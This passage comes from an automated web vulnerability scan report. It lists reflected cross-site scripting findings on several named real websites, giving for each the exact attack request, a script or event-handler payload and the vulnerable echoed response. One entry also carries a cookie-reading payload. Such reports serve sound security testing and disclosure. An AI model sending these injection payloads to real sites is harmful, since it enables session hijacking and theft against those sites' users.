Content-Type: text/html; charset=UTF-8
Content-Length: 7889

<title>Linux Software Map: Error</title>
<link href="/main.css" rel="stylesheet" type="text/css">

<body>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.pus
...[SNIP]...
<a class="lmenu" href="/cgi-bin/printable.cgi?url=http://www.boutell.com/lsm/lsmbyid.cgi/002057/x22?fffc0"><script>alert(1)</script>e04eff45495=1">
...[SNIP]...

4.1177. http://www.espatial.com/contact/live-trial-adwords [kw parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.espatial.com
Path:	/contact/live-trial-adwords

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b46d4"><script>alert(1)</script>d39b1f17c61 was submitted in the kw parameter. This input was echoed as b46d4\"><script>alert(1)</script>d39b1f17c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/live-trial-adwords?utm_source=Google&utm_medium=PPC&kw=erdas%20extensions%20for%20arcgisb46d4"><script>alert(1)</script>d39b1f17c61&utm_campaign=Competitors-Competitor_Companies/ HTTP/1.1
Host: www.espatial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:07:05 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.espatial.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31515

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Discover the power of GIS with web delivery | eSpatial GIS USA</title>
<meta name="google-site-verification"
...[SNIP]...
<input id="kw" name="LEADCF20" type="text" value="erdas extensions for arcgisb46d4\"><script>alert(1)</script>d39b1f17c61″ />
...[SNIP]...

4.1178. http://www.espatial.com/contact/live-trial-adwords [utm_campaign parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.espatial.com
Path:	/contact/live-trial-adwords

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8de0"><script>alert(1)</script>e98382c987e was submitted in the utm_campaign parameter. This input was echoed as d8de0\"><script>alert(1)</script>e98382c987e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/live-trial-adwords?utm_source=Google&utm_medium=PPC&kw=erdas%20extensions%20for%20arcgis&utm_campaign=Competitors-Competitor_Companies/d8de0"><script>alert(1)</script>e98382c987e HTTP/1.1
Host: www.espatial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:07:30 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.espatial.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31515

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Discover the power of GIS with web delivery | eSpatial GIS USA</title>
<meta name="google-site-verification"
...[SNIP]...
<input id="campaign" name="LEADCF18" type="text" value="Competitors-Competitor_Companies/d8de0\"><script>alert(1)</script>e98382c987e” />
...[SNIP]...

4.1179. http://www.espatial.com/contact/live-trial-adwords [utm_medium parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.espatial.com
Path:	/contact/live-trial-adwords

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51199"><script>alert(1)</script>56bf2d5010f was submitted in the utm_medium parameter. This input was echoed as 51199\"><script>alert(1)</script>56bf2d5010f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/live-trial-adwords?utm_source=Google&utm_medium=PPC51199"><script>alert(1)</script>56bf2d5010f&kw=erdas%20extensions%20for%20arcgis&utm_campaign=Competitors-Competitor_Companies/ HTTP/1.1
Host: www.espatial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:06:42 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.espatial.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31515

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Discover the power of GIS with web delivery | eSpatial GIS USA</title>
<meta name="google-site-verification"
...[SNIP]...
<input id="medium" maxlength="100" name="LEADCF16" type="text" value="PPC51199\"><script>alert(1)</script>56bf2d5010f” />
...[SNIP]...

4.1180. http://www.espatial.com/contact/live-trial-adwords [utm_source parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.espatial.com
Path:	/contact/live-trial-adwords

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 343dc"><script>alert(1)</script>8d97a1fb067 was submitted in the utm_source parameter. This input was echoed as 343dc\"><script>alert(1)</script>8d97a1fb067 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/live-trial-adwords?utm_source=Google343dc"><script>alert(1)</script>8d97a1fb067&utm_medium=PPC&kw=erdas%20extensions%20for%20arcgis&utm_campaign=Competitors-Competitor_Companies/ HTTP/1.1
Host: www.espatial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:06:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.espatial.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31515

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Discover the power of GIS with web delivery | eSpatial GIS USA</title>
<meta name="google-site-verification"
...[SNIP]...
<input id="source" name="LEADCF19" type="text" value="Google343dc\"><script>alert(1)</script>8d97a1fb067″ />
...[SNIP]...

4.1181. http://www.flashedition.com/flippingGen.php [lim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.flashedition.com
Path:	/flippingGen.php

Issue detail

The value of the lim request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d300a"%3balert(1)//466e3d06500 was submitted in the lim parameter. This input was echoed as d300a";alert(1)//466e3d06500 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /flippingGen.php?i=53162&m=12191&ttype=curlstatic&popup=true&h=148&lim=d300a"%3balert(1)//466e3d06500&remToolbars=true&roll= HTTP/1.1
Host: www.flashedition.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 02:46:47 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 1540

<html>
<head>
<script type="text/javascript" src="http://www.flashedition.com/javascript/AC_RunActiveContent.js"></script>
<script type="text/javascript">
function pop(dest) {
window.open(dest,'Ar
...[SNIP]...
<script type="text/javascript">
var flashvars = "|type=curl|lim=d300a";alert(1)//466e3d06500|roll=Click Here|remToolbars=true|0";
AC_FL_RunContent( 'codebase','http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0','width','104','height','135','align','middle',
...[SNIP]...

4.1182. http://www.flashedition.com/flippingGen.php [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.flashedition.com
Path:	/flippingGen.php

Issue detail

The value of the m request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2891"><script>alert(1)</script>9f569d106b3 was submitted in the m parameter. This input was echoed as d2891\"><script>alert(1)</script>9f569d106b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flippingGen.php?i=53162&m=12191d2891"><script>alert(1)</script>9f569d106b3&ttype=curlstatic&popup=true&h=148&lim=&remToolbars=true&roll= HTTP/1.1
Host: www.flashedition.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 02:46:02 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 1556

<html>
<head>
<script type="text/javascript" src="http://www.flashedition.com/javascript/AC_RunActiveContent.js"></script>
<script type="text/javascript">
function pop(dest) {
window.open(dest,'Ar
...[SNIP]...
<a href="http://www.flashedition.com/publication?m=12191d2891\"><script>alert(1)</script>9f569d106b3&l=1">
...[SNIP]...

4.1183. http://www.flashedition.com/flippingGen.php [remToolbars parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.flashedition.com
Path:	/flippingGen.php

Issue detail

The value of the remToolbars request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d68a"%3balert(1)//12a5c5f7f74 was submitted in the remToolbars parameter. This input was echoed as 6d68a";alert(1)//12a5c5f7f74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /flippingGen.php?i=53162&m=12191&ttype=curlstatic&popup=true&h=148&lim=&remToolbars=true6d68a"%3balert(1)//12a5c5f7f74&roll= HTTP/1.1
Host: www.flashedition.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 02:46:58 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 1540

<html>
<head>
<script type="text/javascript" src="http://www.flashedition.com/javascript/AC_RunActiveContent.js"></script>
<script type="text/javascript">
function pop(dest) {
window.open(dest,'Ar
...[SNIP]...
<script type="text/javascript">
var flashvars = "|type=curl|lim=|roll=Click Here|remToolbars=true6d68a";alert(1)//12a5c5f7f74|0";
AC_FL_RunContent( 'codebase','http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0','width','104','height','135','align','middle','allowScriptAccess','always','src
...[SNIP]...

4.1184. http://www.flashedition.com/flippingGen.php [roll parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.flashedition.com
Path:	/flippingGen.php

Issue detail

The value of the roll request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec7c6"%3balert(1)//123eb991fc6 was submitted in the roll parameter. This input was echoed as ec7c6";alert(1)//123eb991fc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /flippingGen.php?i=53162&m=12191&ttype=curlstatic&popup=true&h=148&lim=&remToolbars=true&roll=ec7c6"%3balert(1)//123eb991fc6 HTTP/1.1
Host: www.flashedition.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 02:47:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 1530

<html>
<head>
<script type="text/javascript" src="http://www.flashedition.com/javascript/AC_RunActiveContent.js"></script>
<script type="text/javascript">
function pop(dest) {
window.open(dest,'Ar
...[SNIP]...
<script type="text/javascript">
var flashvars = "|type=curl|lim=|roll=ec7c6";alert(1)//123eb991fc6|remToolbars=true|0";
AC_FL_RunContent( 'codebase','http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0','width','104','height','135','align','middle','allowScriptAcce
...[SNIP]...

4.1185. http://www.flashedition.com/publication [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.flashedition.com
Path:	/publication

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc6ee"-alert(1)-"5a80650f1f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /publication?i=53162&fc6ee"-alert(1)-"5a80650f1f2=1 HTTP/1.1
Host: www.flashedition.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 13:15:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
P3P: policyref="/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAo PSDo CONo TELo OUR DELo SAMo OTRo BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: PHPSESSID=l2euff51eop9u11c04vqou2vi2; expires=Tue, 25-Jan-2011 17:15:17 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: u_id=l2euff51eop9u11c04vqou2vi2; expires=Wed, 25-Jan-2012 13:15:17 GMT
Set-Cookie: ie_warn=1; expires=Wed, 25-Jan-2012 13:15:17 GMT
Vary: Accept-Encoding
Content-Length: 6822
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
ude: lat_lng,
cloud: "",
Referrer: "",
VersionNo: "viewer-184",
Client_TZ_Offset: currentTime.getTimezoneOffset(),
Browser_Plugins: plugins,
Request_URI: "/publication/?i=53162&fc6ee"-alert(1)-"5a80650f1f2=1",
toolbar_type: "1",
Analytics_URL: "http://collector.thermstats.com/", domain: "http://www.flashedition.com",
page: "1",
analytics: "1",
preLoaderSource: "/publicatio
...[SNIP]...

4.1186. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.google.com
Path:	/advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e8b16(a)ffc7188f57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /advanced_search?e8b16(a)ffc7188f57=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 24 Jan 2011 16:39:54 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?e8b16(a)ffc7188f57\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

4.1187. http://www.iloubnan.info/artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.iloubnan.info
Path:	/artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d40"><img%20src%3da%20onerror%3dalert(1)>8a98a4ad0ce was submitted in the REST URL parameter 6. This input was echoed as 96d40"><img src=a onerror=alert(1)>8a98a4ad0ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /artsandculture/actualite/id/47982/theme/11196d40"><img%20src%3da%20onerror%3dalert(1)>8a98a4ad0ce/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22 HTTP/1.1
Host: www.iloubnan.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 406 Not Acceptable
Date: Mon, 24 Jan 2011 16:46:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=7c35695191a00bdfc899004adec3777e; path=/
Connection: close
Content-Type: text/html
Content-Length: 29989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"

xmlns:og="http://opengraph
...[SNIP]...
<a href="/artsandculture/actualites/theme/11196d40"><img src=a onerror=alert(1)>8a98a4ad0ce">
...[SNIP]...

4.1188. http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.joomlacorner.com
Path:	/joomla-news/608-joomla-16-has-arrived.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86f61"><a>94b097f275a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /joomla-news/608-joomla-16-has-arrived.html?86f61"><a>94b097f275a=1 HTTP/1.1
Host: www.joomlacorner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.16
Set-Cookie: 992260232bef5a730b1bd291176df96d=939f6a9032f82658be7e27481228eac4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_anion_tpl=ja_anion; expires=Sat, 14-Jan-2012 15:17:55 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:17:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html?86f61"><a>94b097f275a=1&layout=button_count&show_faces=true&action=like&colorscheme=light&width=90&height=20" scrolling="no" frameborder="0" style="border:none; overflow:hidden;" allowTransparency="
...[SNIP]...

4.1189. http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.joomlacorner.com
Path:	/joomla-news/608-joomla-16-has-arrived.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 8e400><a>e79886acd90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /joomla-news/608-joomla-16-has-arrived.html?8e400><a>e79886acd90=1 HTTP/1.1
Host: www.joomlacorner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.16
Set-Cookie: 992260232bef5a730b1bd291176df96d=5009afaf1ce89542e374ff7187e38db3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_anion_tpl=ja_anion; expires=Sat, 14-Jan-2012 15:16:55 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:16:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th">

...[SNIP]...
<a title="Joomla!.. 1.6 ..................!" class="google-buzz-button" href="http://www.google.com/buzz/post" data-url=http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html?8e400><a>e79886acd90=1 data-button-style="small-count">
...[SNIP]...

4.1190. http://www.linkagogo.com/go/AddNoPopup [title parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.linkagogo.com
Path:	/go/AddNoPopup

Issue detail

The value of the title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 913f2"><script>alert(1)</script>ce47769743c was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/AddNoPopup?url={u}&title={t}913f2"><script>alert(1)</script>ce47769743c HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:33 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27evaQ"
Last-Modified: Tue, 25 Jan 2011 04:42:34 GMT
Cache-Control: no-cache
Expires: 0
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:42:33 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:42:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 16442

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...
<input type="text" name="title" value="{t}913f2"><script>alert(1)</script>ce47769743c" size="50" maxlength="128">
...[SNIP]...

4.1191. http://www.linkagogo.com/go/AddNoPopup [title parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.linkagogo.com
Path:	/go/AddNoPopup

Issue detail

The value of the title request parameter is copied into the HTML document as plain text between tags. The payload b7049<script>alert(1)</script>1c38d89fec7 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/AddNoPopup?url={u}&title={t}b7049<script>alert(1)</script>1c38d89fec7 HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:39 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27ew4A"
Last-Modified: Tue, 25 Jan 2011 04:42:40 GMT
Cache-Control: no-cache
Expires: 0
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:42:38 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:42:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 16436

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...
<textarea name="comments" rows=4 cols=50 wrap>{t}b7049<script>alert(1)</script>1c38d89fec7</textarea>
...[SNIP]...

4.1192. http://www.linkagogo.com/go/AddNoPopup [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.linkagogo.com
Path:	/go/AddNoPopup

Issue detail

